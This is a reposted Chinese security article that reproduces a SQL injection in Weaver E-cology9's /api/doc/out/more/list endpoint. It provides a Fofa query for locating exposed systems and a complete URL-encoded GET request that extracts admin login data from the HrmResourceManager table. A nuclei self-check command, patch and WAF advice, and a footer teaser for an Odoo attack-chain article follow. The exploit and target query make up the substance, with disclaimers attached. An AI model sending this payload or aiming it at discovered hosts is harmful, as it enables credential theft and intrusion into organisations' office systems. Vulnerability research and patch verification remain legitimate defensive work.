漏洞复现|泛微E-cology9docSQL注入漏洞

admin 2026-09-11 05:10:57 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 泛微e-cology9的/api/doc/out/more/list接口存在SQL注入漏洞,攻击者可构造恶意参数导致数据库敏感信息泄露或获取系统权限。影响范围为泛微e-cology9,已提供POC及nuclei自查脚本,建议联系厂商升级补丁并增加WAF防护。 综合评分: 70 文章分类: 漏洞分析,漏洞poc,web安全


漏洞复现 |泛微E-cology9 doc SQL注入漏洞

Poc复现

2026年9月3日 12:00 广东

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

免责声明

「此公众号所分享的网络安全知识、信息及工具皆来源互联网公开收集整理,仅供学习和研究使用,请勿用于非法测试活动。由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,产生的一切后果由读者自行承担,皆与本公众号及文章作者无关、不负任何责任!!!」「如有内容侵权,请联系我们删除处理。谢谢合作!!!」

漏洞概述

泛微E-cology9 /api/doc/out/more/list 接口存在SQL注入漏洞,攻击者可以通过构造恶意参数进行注入攻击,可能导致数据库敏感信息泄露,甚至进一步获取服务器系统权限。

影响范围

泛微E-cology9

空间测绘

Fofa

app="泛微-协同商务系统"

漏洞复现

Poc

GET /api/doc/out/more/list?isNew=1&elementmore=%7B%22srcType%22%3A%20%222%22%2C%20%22srcContent%22%3A%20%22%2A%2F%3D%28%28-1%22%2C%20%22perpage%22%3A%20%2210%22%7D&docarchivedatefrom=a%27OR-1%2F%2Aa&doccreatedatefrom=%2A%2F%3D%28%2F%2Aa&doclastmoddatefrom=%2A%2FSELECT-3%2Blocate%2F%2A&docarchivedateto=%2A%2F%28hex%28SUBSTRING%28%2F%2A&doccreatedateto=%2A%2Floginid%2C1%2C1%29%29%2C%27073%27%29%20%2F%2A&doclastmoddateto=%2A%2Ffrom%20HrmResourceManager%20limit%200%2C1%29%20OR-1%2F%2A HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip

漏洞自查

Nuclei

nuclei.exe -u 目标URL -stats -silent -t weaver-ecology9-api-doc-sql-injection.yaml

修复建议

  • • 建议联系厂商打补丁或升级版本。
  • • 增加Web应用防火墙防护。

poc免费获取


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Poc复现 《漏洞复现 |泛微E-cology9 doc SQL注入漏洞》

odoo渗透测试 网络安全文章

odoo渗透测试

文章总结: 本文详细记录了Odoo系统从弱口令登录到获取服务器权限的完整攻击链:弱口令进入后台、开启开发者模式、创建ServerAction执行Python代码
评论:0   参与:  0